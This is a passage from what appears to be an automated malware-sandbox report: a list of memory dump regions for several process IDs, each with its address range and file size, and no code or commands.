                                                                                                                                                                                                                                                                    • memory/5440-835-0x0000000000E40000-0x0000000001301000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                    • memory/5440-820-0x0000000000E40000-0x0000000001301000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                    • memory/5492-1182-0x0000000000E40000-0x0000000001301000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                    • memory/5492-1177-0x0000000000E40000-0x0000000001301000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                    • memory/5596-317-0x00000000055C0000-0x000000000560C000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                    • memory/5596-256-0x0000000000810000-0x0000000000860000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      320KB

                                                                                                                                                                                                                                                                    • memory/5596-312-0x00000000053F0000-0x0000000005402000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                                                                    • memory/5596-316-0x0000000005580000-0x00000000055BC000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      240KB

                                                                                                                                                                                                                                                                    • memory/5596-257-0x0000000005910000-0x0000000005EB4000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                    • memory/5596-258-0x0000000005240000-0x00000000052D2000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      584KB

                                                                                                                                                                                                                                                                    • memory/5596-423-0x0000000005850000-0x00000000058B6000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                                                    • memory/5596-273-0x0000000005310000-0x000000000531A000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                    • memory/5596-311-0x0000000005650000-0x000000000575A000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                    • memory/5596-280-0x00000000064E0000-0x0000000006AF8000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      6.1MB

                                                                                                                                                                                                                                                                    • memory/5824-336-0x000002A31BC40000-0x000002A31BC62000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                    • memory/5912-601-0x0000000000D70000-0x000000000141F000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                                    • memory/5912-1028-0x0000000000D70000-0x000000000141F000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                                    • memory/5916-319-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                    • memory/5984-841-0x0000000000290000-0x0000000000740000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                    • memory/5984-821-0x0000000000290000-0x0000000000740000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                    • memory/6048-1176-0x0000000000A60000-0x000000000110F000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                                    • memory/6060-800-0x0000000006640000-0x0000000006662000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                    • memory/6060-779-0x0000000005D30000-0x0000000006084000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                    • memory/6060-799-0x00000000065F0000-0x000000000660A000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                                    • memory/6060-798-0x0000000007210000-0x00000000072A6000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      600KB

                                                                                                                                                                                                                                                                    • memory/6096-546-0x0000000007E10000-0x000000000833C000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      5.2MB

                                                                                                                                                                                                                                                                    • memory/6096-371-0x0000000005AF0000-0x0000000005B66000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                                                                    • memory/6096-372-0x00000000064E0000-0x00000000064FE000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                    • memory/6096-544-0x0000000007710000-0x00000000078D2000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.8MB

                                                                                                                                                                                                                                                                    • memory/6096-353-0x0000000000540000-0x0000000000592000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                                                                    • memory/6096-439-0x0000000006AC0000-0x0000000006B10000-memory.dmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      320KB